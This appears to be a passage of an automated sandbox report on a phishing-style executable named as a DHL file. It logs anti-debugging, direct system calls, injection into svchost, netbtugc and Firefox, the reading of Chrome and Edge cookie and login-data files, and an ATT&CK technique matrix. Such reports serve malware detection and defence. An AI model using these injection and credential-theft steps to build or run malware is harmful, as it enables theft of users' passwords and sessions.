            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov esi, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03442840 mov ecx, dword ptr fs:[00000030h]1_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460854 mov eax, dword ptr fs:[00000030h]1_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC810 mov eax, dword ptr fs:[00000030h]1_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov ecx, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A830 mov eax, dword ptr fs:[00000030h]1_2_0346A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E8C0 mov eax, dword ptr fs:[00000030h]1_2_0345E8C0
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00E00B62
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DD2622
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DC083F
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC09D5 SetUnhandledExceptionFilter,0_2_00DC09D5
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DC0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 5688Jump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28D4008Jump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E01201
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DE2BA5
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0B226 SendInput,keybd_event,0_2_00E0B226
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00E222DA
            Source: C:\Users\user\Desktop\DHL 073412182024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 073412182024.exe"Jump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00E00B62
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E01663
            Source: DHL 073412182024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: DHL 073412182024.exe, ihoQcJjaPvtmjn.exe, 00000002.00000002.4179632256.00000000012F1000.00000002.00000001.00040000.00000000.sdmp, ihoQcJjaPvtmjn.exe, 00000002.00000000.1806747100.00000000012F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4179632256.00000000012F1000.00000002.00000001.00040000.00000000.sdmp, ihoQcJjaPvtmjn.exe, 00000002.00000000.1806747100.00000000012F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4179632256.00000000012F1000.00000002.00000001.00040000.00000000.sdmp, ihoQcJjaPvtmjn.exe, 00000002.00000000.1806747100.00000000012F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4179632256.00000000012F1000.00000002.00000001.00040000.00000000.sdmp, ihoQcJjaPvtmjn.exe, 00000002.00000000.1806747100.00000000012F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC0698 cpuid 0_2_00DC0698
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E18195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00E18195
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DFD27A GetUserNameW,0_2_00DFD27A
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DDBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00DDBB6F
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DA42DE

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4190913591.0000000008D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4179927444.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1883088525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4178788966.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1884125832.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4180201411.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: DHL 073412182024.exeBinary or memory string: WIN_81
            Source: DHL 073412182024.exeBinary or memory string: WIN_XP
            Source: DHL 073412182024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: DHL 073412182024.exeBinary or memory string: WIN_XPe
            Source: DHL 073412182024.exeBinary or memory string: WIN_VISTA
            Source: DHL 073412182024.exeBinary or memory string: WIN_7
            Source: DHL 073412182024.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4190913591.0000000008D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4179927444.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1883088525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4178788966.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1884125832.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4180201411.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00E21204
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E21806
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets241
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials12
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
